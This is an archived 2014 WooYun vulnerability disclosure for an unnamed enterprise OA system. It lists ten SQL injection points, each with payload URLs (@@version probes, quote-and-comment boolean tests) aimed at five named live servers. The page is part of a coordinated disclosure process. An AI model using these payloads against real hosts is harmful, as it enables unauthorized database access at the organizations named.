当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065421

漏洞标题:某通用企业版OA系统SQL注入大礼包

相关厂商:cncert国家互联网应急中心

漏洞作者: what_news

提交时间:2014-06-19 09:01

修复时间:2014-09-17 09:02

公开时间:2014-09-17 09:02

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-19: 细节已通知厂商并且等待厂商处理中
2014-06-21: 厂商已经确认,细节仅向厂商公开
2014-06-24: 细节向第三方安全合作伙伴开放
2014-08-15: 细节向核心白帽子及相关领域专家公开
2014-08-25: 细节向普通白帽子公开
2014-09-04: 细节向实习白帽子公开
2014-09-17: 细节向公众公开

简要描述:

通用 希望能再上首页
排版不易,首页更不易且行且珍惜了

详细说明:

在一次提交,注入估计都被我找光了 所以希望上个首页 别人也刷不了了
花了好长时间才排好版 不容易。。。
第一处

http://oa.gdjierong.com:8090/PersonalAffair/worklog_template_show.aspx?id=@@version


http://www.kinghighway.com:9000/PersonalAffair/worklog_template_show.aspx?id=@@version


http://oa.ruvar.com/PersonalAffair/worklog_template_show.aspx?id=@@version


http://oa.mingshiedu.com:801/PersonalAffair/worklog_template_show.aspx?id=@@version


http://116.204.107.145:9000/PersonalAffair/worklog_template_show.aspx?id=@@version


611.png


612.png


613.png


614.png


615.png


第二处

http://oa.gdjierong.com:8090/ProjectManage/pm_gatt_inc.aspx?project_id=@@version


http://www.kinghighway.com:9000/ProjectManage/pm_gatt_inc.aspx?project_id=@@version


http://oa.ruvar.com/ProjectManage/pm_gatt_inc.aspx?project_id=@@version


http://oa.mingshiedu.com:801/ProjectManage/pm_gatt_inc.aspx?project_id=@@version


http://116.204.107.145:9000/ProjectManage/pm_gatt_inc.aspx?project_id=@@version


711.png


712.png


713.png


714.png


715.png


第三处

http://oa.gdjierong.com:8090/WorkPlan/plan_template_preview.aspx?template_id=@@version


http://www.kinghighway.com:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version


http://oa.ruvar.com/WorkPlan/plan_template_preview.aspx?template_id=@@version


http://oa.mingshiedu.com:801/WorkPlan/plan_template_preview.aspx?template_id=@@version


http://116.204.107.145:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version


811.png


812.png


813.png


814.png


815.png


第四处

http://oa.gdjierong.com:8090/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29--


http://www.kinghighway.com:9000/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29--


http://oa.ruvar.com/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29--


http://oa.mingshiedu.com:801/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29--


http://116.204.107.145:9000/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29--


911.png


912.png


913.png


914.png


915.png


第5处

http://oa.gdjierong.com:8090/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0--


http://www.kinghighway.com:9000/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0--


http://oa.ruvar.com/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0--


http://oa.mingshiedu.com:801/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0--


http://116.204.107.145:9000/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0--


111.png


112.png


113.png


114.png


115.png


第6处

http://oa.gdjierong.com:8090/WorkFlow/wf_work_print.aspx?idlist=@@version


http://www.kinghighway.com:9000/WorkFlow/wf_work_print.aspx?idlist=@@version


http://oa.ruvar.com/WorkFlow/wf_work_print.aspx?idlist=@@version


http://oa.mingshiedu.com:801/WorkFlow/wf_work_print.aspx?idlist=@@version


http://116.204.107.145:9000/WorkFlow/wf_work_print.aspx?idlist=@@version


211.png


212.png


213.png


214.png


215.png


第7处

http://oa.gdjierong.com:8090/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version


http://www.kinghighway.com:9000/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version


http://oa.ruvar.com/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version


http://oa.mingshiedu.com:801/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version


http://116.204.107.145:9000/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version


311.png


312.png


313.png


314.png


315.png


第8处

http://oa.gdjierong.com:8090/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version


http://www.kinghighway.com:9000/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version


http://oa.ruvar.com/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version


http://oa.mingshiedu.com:801/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version


http://116.204.107.145:9000/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version


411.png


412.png


413.png


414.png


415.png


第9处

http://oa.gdjierong.com:8090/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version


http://www.kinghighway.com:9000/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version


http://oa.ruvar.com/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version


http://oa.mingshiedu.com:801/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version


http://116.204.107.145:9000/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version


511.png


512.png


513.png


514.png


515.png


第10处 id存在注入

http://oa.gdjierong.com:8090/WorkFlow/wf_office_file_history_show.aspx?id=1' and 1=1--


http://www.kinghighway.com:9000/WorkFlow/wf_office_file_history_show.aspx?id=1' and 1=1--


http://oa.ruvar.com/WorkFlow/wf_office_file_history_show.aspx?id=1' and 1=1--


oa.mingshiedu.com:801/WorkFlow/wf_office_file_history_show.aspx?id=1' and 1=1--


116.204.107.145:9000/WorkFlow/wf_office_file_history_show.aspx?id=1' and 1=1--


漏洞证明:

漏洞证明如上

修复方案:

对参数进行处理吧

版权声明:转载请注明来源 what_news@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-21 12:54

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-11 16:51 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    那么多注入,很多¥?

  2. 2014-07-11 19:38 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @wefgod 感觉不是按注入个数算¥的

  3. 2014-08-28 15:10 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @wefgod 只有100元 哎!!!

  4. 2014-08-29 10:48 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @what_news 我去,和我之前一样呢。哈哈

  5. 2014-08-29 11:05 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @wefgod 提交了3个oa 都是100 哈哈

  6. 2014-09-20 21:25 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    马克